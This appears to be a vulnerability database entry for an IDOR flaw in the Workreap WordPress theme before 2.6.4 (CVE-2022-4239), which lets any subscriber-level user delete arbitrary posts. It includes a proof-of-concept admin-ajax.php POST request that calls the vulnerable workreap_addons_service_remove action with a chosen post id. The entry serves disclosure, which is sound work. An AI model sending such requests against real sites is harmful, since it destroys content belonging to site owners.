Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitVeshraj GhimireWPEX-ID:1C163987-FB53-43F7-BBFF-1C2D8C0D694C
HistoryDec 02, 2022 - 12:00 a.m.

Workreap < 2.6.4 - Subscriber+ Arbitrary Posts Deletion via IDOR

2022-12-0200:00:00
Veshraj Ghimire
71
workreap
arbitrary posts deletion
idor
subscriber+
security vulnerability

0.001 Low

EPSS

Percentile

23.5%

JSON

The theme does not verify that an addon service belongs to the user issuing the request, or indeed that it is an addon service, when processing the workreap_addons_service_remove action, allowing any user to delete any post by knowing or guessing the id.

POST /testt/wp-admin/admin-ajax.php HTTP/2
Host: host
Cookie: [Subscriber+]
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 65

action=workreap_addons_service_remove&id=6191&security=295c6a26b2

Related

cve 1
prion 1
wpvulndb 1
cvelist 1
nvd 1
cve
cve
CVE-2022-4239
2022-12-26 13:15:13
prion
prion
Heap overflow
2022-12-26 13:15:00
wpvulndb
wpvulndb
Workreap < 2.6.4 - Subscriber+ Arbitrary Posts Deletion via IDOR
2022-12-02 00:00:00
cvelist
cvelist
CVE-2022-4239 Workreap < 2.6.4 - Subscriber+ Arbitrary Posts Deletion via IDOR
2022-12-26 12:28:20
nvd
nvd
CVE-2022-4239
2022-12-26 13:15:13

0.001 Low

EPSS

Percentile

23.5%

JSON
Related for WPEX-ID:1C163987-FB53-43F7-BBFF-1C2D8C0D694C
cve1prion1wpvulndb1cvelist1nvd1